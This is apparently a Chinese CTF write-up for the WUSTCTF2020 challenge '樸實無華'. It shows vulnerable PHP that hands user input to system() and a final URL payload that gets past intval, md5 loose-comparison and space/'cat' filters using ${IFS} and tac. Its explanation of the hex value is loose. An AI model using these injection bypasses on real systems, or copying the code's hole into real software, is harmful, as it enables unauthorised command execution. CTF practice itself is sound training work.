刷題[WUSTCTF2020]樸實無華
阿新 • • 發佈:2020-08-13
解題思路
開啟是一個這樣的頁面,檢視原始碼發現什麼人間極樂bot,試試是不是robots.txt,檢視發現類似flag檔案,檢視發現是假的flag,但是burp抓包後發現,返回的頭部有資訊
原始碼出來了,程式碼審計一波
程式碼審計
<?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "我不經意間看了看我的勞力士, 不是想看時間, 只是想不經意間, 讓你知道我過得比你好.</br>"; }else{ die("金錢解決不了窮人的本質問題"); } }else{ die("去非洲吧"); } //level 2 if (isset($_GET['md5'])){ $md5=$_GET['md5']; if ($md5==md5($md5)) echo "想到這個CTFer拿到flag後, 感激涕零, 跑去東瀾岸, 找一家餐廳, 把廚師轟出去, 自己炒兩個拿手小菜, 倒一杯散裝白酒, 致富有道, 別學小暴.</br>"; else die("我趕緊喊來我的酒肉朋友, 他打了個電話, 把他一家安排到了非洲"); }else{ die("去非洲吧"); } //get flag if (isset($_GET['get_flag'])){ $get_flag = $_GET['get_flag']; if(!strstr($get_flag," ")){ $get_flag = str_ireplace("cat", "wctf2020", $get_flag); echo "想到這裡, 我充實而欣慰, 有錢人的快樂往往就是這麼的樸實無華, 且枯燥.</br>"; system($get_flag); }else{ die("快到非洲了"); } }else{ die("去非洲吧"); } ?>
大致看看,有幾層,成功繞後最後,可以通過system函式程式碼執行
第一層intval函式,算常見的考點吧,也總結過
那麼我們直接num=0x32303231 (即2021的16進位制)
第二層md5弱型別比較,我們只要找一個字串在md5處理後能通過弱比較即可
第三層也很簡單,繞過空格和cat即可,這都總結過
最終payload:/fl4g.php?num=0x32303231&md5=0e215962017&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
總結思路
比較常規,跟著他一步一步走即可
知識點
- php騷操作